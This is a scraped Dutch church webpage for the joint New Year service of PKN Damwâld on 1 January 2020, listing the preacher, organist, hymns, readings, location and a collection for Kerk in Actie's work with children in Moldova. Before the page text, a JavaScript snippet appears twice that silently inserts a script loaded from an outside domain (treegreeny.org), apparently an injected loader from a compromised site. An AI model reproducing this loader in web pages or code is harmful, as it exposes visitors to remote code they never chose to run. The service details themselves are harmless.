;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Gezamenlijke nieuwjaarsdienst - PKN Damwâld
woensdag 1 januari 2020
10:00 uur
Na de dienst is er koffiedrinken in 't Skûlplak

Gezamenlijke nieuwjaarsdienst

Informatie

Voorganger:Ds. S. Boukes
Organist:Tim van der Weide
Mededeling:Na de dienst is er koffiedrinken in 't Skûlplak
Liturgie
lied voor de dienst NLB 513
Welkom
We zingen: NLB 92 : 1 en 3
Stil Gebed, Votum en Groet
We zingen: NLB 213 : 1 en 2
Gebed
We lezen: Psalm 97
We zingen: NLB 97 : 1 en 3
We lezen: Romeinen 8 : 31-39
We zingen: NLB 675 : 2
Preek Psalm 97 : 11
We zingen: NLB 97 : 6
Dankgebed en voorbeden
Collecte
Slotlied Elb 174 : 1 en 3
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Geef licht aan kinderen in de Knel in Moldavië

Geef licht aan kinderen in de Knel in Moldavië
Voor miljoenen kinderen op deze wereld is het elke dag donker. Ze moeten leven met oorlog, armoede of ziekte. Ook in Moldavië, het armste land van Europa. Veel mensen proberen werk te vinden in het buitenland en laten hun kinderen thuis achter. Kinderen in Moldavië zijn daarom vaak al op jonge leeftijd op zichzelf aangewezen en krijgen niet de zorg die ze zo hard nodig hebben. De organisatie Bethania komt op voor deze kinderen. In twee opvangcentra krijgen kinderen naschoolse opvang, huiswerkbegeleiding en een goede maaltijd. De meeste kinderen die naar het centrum komen, hebben gedragsproblemen. Daarop biedt het centrum psychologische begeleiding en therapie. Bethania wil de kinderen een veilige plek bieden, zorgen dat zij naar school blijven gaan en hun school succesvol kunnen afmaken. Op langere termijn betekent dit dat zij minder risico lopen om verslaafd te raken aan alcohol en drugs en minder kans lopen om het slachtoffer te worden van mensenhandel. Met de opbrengst van deze collecte wil Kerk in Actie kinderen in Moldavië een lichtpuntje bieden in hun donkere bestaan. Ook worden andere Kinderen in de knelprojecten gesteund. Helpt u mee?

Tweede collecte: Kerk
Uitganscollecte: Kerk